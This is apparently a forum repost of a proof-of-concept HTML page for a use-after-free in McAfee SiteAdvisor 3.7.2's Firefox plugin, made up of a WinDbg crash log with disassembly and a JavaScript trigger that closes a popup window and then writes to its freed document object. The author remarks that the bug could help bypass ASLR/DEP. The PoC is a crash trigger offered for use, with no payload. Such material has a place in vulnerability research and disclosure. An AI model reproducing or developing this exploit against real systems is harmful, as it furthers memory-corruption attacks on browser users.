[HTML] 纯文本查看 复制代码 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, [url]www.pspad.com[/url]">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: [url]https://twitter.com/m_ressel[/url]
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: [url]https://www.siteadvisor.com/[/url]
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
i mean firefox will not crash after trigger uaf i McAfee
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj[p] == 'string')
{
try{ obj[p] = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
win.onload = crash;
</script>
</body>
</html> | 
发表于 2015-7-6 12:34:59
发表于 2015-7-6 15:10:39
